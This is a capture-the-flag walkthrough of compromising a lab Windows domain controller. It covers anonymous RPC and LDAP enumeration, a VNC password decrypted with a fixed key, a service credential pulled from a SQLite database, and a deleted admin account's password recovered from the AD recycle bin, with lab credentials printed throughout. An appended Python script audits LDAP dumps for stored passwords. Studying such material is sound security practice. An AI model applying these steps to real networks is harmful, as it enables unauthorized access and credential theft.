Basic information

Port scan

Windows server, no web service, domain-related ports are open.

135

RPC allows anonymous access, so rpcclient can be used directly:

rpcclient 10.10.10.182 -U ""
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $>

enum enum enum

After that comes enumeration of every kind:

# raw.txt holds the enumdomusers output above; pull out the RIDs (e.g. 0x1f5)
cat raw.txt | while read line; do echo "$line" | cut -d' ' -f2 | cut -d':' -f2 | cut -d'[' -f2 | cut -d']' -f1; done > user.txt
# query each RID for the full account record (anonymous bind, one query per second)
cat user.txt | while read line; do rpcclient -U "" --no-pass -c "queryuser $line" 10.10.10.182; sleep 1; done > userinfo.txt
# and extract the plain usernames from the same output
cat raw.txt | while read line; do echo "$line" | cut -d' ' -f1 | cut -d':' -f2 | cut -d'[' -f2 | cut -d']' -f1; done > user_name.txt

For now we only have some user information.

389

Port 389 is LDAP.

ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" > ldap_info.txt

The output contains a great deal of information; search through it carefully.

cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local

cascadeLegacyPwd: clk0bjVldmE= # base64 decode : rY4n5eva

We now have a set of credentials:

r.thompson : rY4n5eva

smbclient

evil-winrm fails with this account, but smbclient works:

Data\IT

Download the IT directory:

This file contains some information:

This log contains a password:

Decoding this password straight from hex gives the wrong result; searching for "VNC Install.reg password" turns up the relevant material:

>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), fixedkey
=> "sT333ve2"
>>

Another set of credentials:

s.smith : sT333ve2

NETLOGON

NETLOGON contains two vbs files:

SYSVOL

Download this directory, because Groups.xml may contain usernames and passwords (GPP):

user flag

In the previous step we obtained s.smith's credentials; log in with this account to get user.txt:

s.smith : sT333ve2

enum more

Continue gathering information with the s.smith account:

Audit$\DB

This directory contains a db file; download it and inspect it, it is SQLite3:

➜  ~ sqlite3 Audit.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from misc;
sqlite>

The Ldap table yields information, but decoding it as base64 directly gives garbage; searching for this base64 string finds the relevant material:

https://dotnetfiddle.net/2RDoWz

So now we have a new set of credentials:

ArkSvc : w3lc0meFr31nd

IT\Logs\Ark AD Recycle Bin

ArkAdRecycleBin.log contains the relevant information; you can see that the TempAdmin seen earlier was deleted by the ArkSvc user:

AD Object

Searching for the "Ark AD Recycle Bin Manager" shown above turns up the relevant material:

Active Directory Recycle Bin | Recover Deleted AD Object | AD Deleted Objects
https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/

# Check whether the AD Recycle Bin optional feature is enabled
Get-ADOptionalFeature -Filter *
# List deleted objects still held in the recycle bin
Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
# Attempt to restore TempAdmin
Get-ADObject -Filter {DisplayName -like 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject

Trying to restore it directly fails:

Change the filter and keep searching for information:

$changeDate = New-Object dateTime(2008,11,18,1,40,02)
Get-ADObject -Filter 'whenChanged -gt $changeDate -and isDeleted -eq $true -and -not (isRecycled -eq $true) -and name -ne "Deleted Objects"' -IncludeDeletedObjects

Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *

cascadeLegacyPwd YmFDVDNyMWFOMDBkbGVz

Base64-decoding it gives TempAdmin's password:

baCT3r1aN00dles
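Ryan Thompson's cascadeLegacyPwd from the ldapsearch dump and TempAdmin's from the recycle bin are the same finding: a custom attribute, readable over LDAP, that stores a base64-wrapped plaintext password. As an added audit example that is not part of the original writeup, this Python script parses ldapsearch LDIF output and flags every credential-named attribute whose value decodes to printable text; the sample LDIF is constructed here, with only the two attribute values taken from this page.

```python
import base64
SUSPECT = ("pwd", "pass", "secret", "cred")   # attribute-name fragments worth auditing

# Constructed ldapsearch-style LDIF. The two cascadeLegacyPwd values are the ones shown
# on this page; the second uses LDIF's ':: ' base64-wrapped form and a folded dn line.
SAMPLE_LDIF = (
    "# extended LDIF\ndn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local\n"
    "pwdLastSet: 132294360317419816\nbadPwdCount: 0\ncascadeLegacyPwd: clk0bjVldmE=\n\n"
    "dn: CN=TempAdmin,CN=Deleted Objects,DC=cascade,\n DC=local\n"
    "cascadeLegacyPwd:: " + base64.b64encode(b"YmFDVDNyMWFOMDBkbGVz").decode() + "\n\n"
    "search: 2\nresult: 0 Success\n"
)

def parse_ldif(text):
    """Return entries as {attr: [values]}; unfolds continuation lines, decodes ':: '."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]               # folded continuation of previous line
        elif not raw.startswith("#"):
            lines.append(raw)
    entries, cur = [], {}
    for line in lines + [""]:
        if not line.strip():                   # blank line terminates an entry
            entries += [cur] if cur else []
            cur = {}
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):              # 'attr:: <base64>' wrapped value
            value = base64.b64decode(value[1:]).decode("utf-8", "replace")
        cur.setdefault(name, []).append(value.strip())
    return entries

def decodes_to_text(value):
    """Plaintext if value is strict base64 of >= 6 printable ASCII bytes, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:                         # binascii.Error is a ValueError subclass
        return None
    return raw.decode("ascii") if len(raw) >= 6 and all(32 <= b < 127 for b in raw) else None

def audit(text):
    """Return (dn, attribute, plaintext) for each value that is base64 of a printable string."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", [""])[0]          # entries without a dn are search metadata
        for attr, values in entry.items():
            if dn and any(k in attr.lower() for k in SUSPECT):
                findings += [(dn, attr, p) for p in map(decodes_to_text, values) if p]
    return findings
```

Counters such as pwdLastSet and badPwdCount match by name but fail the strict base64 check, so they are not reported; run `audit(open("ldap_info.txt").read())` over the full dump and treat every hit as a credential to rotate and an attribute to remove from the directory.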

root flag

According to the earlier email, TempAdmin's password is the same as the Administrator password, so log in directly and get root.txt:

References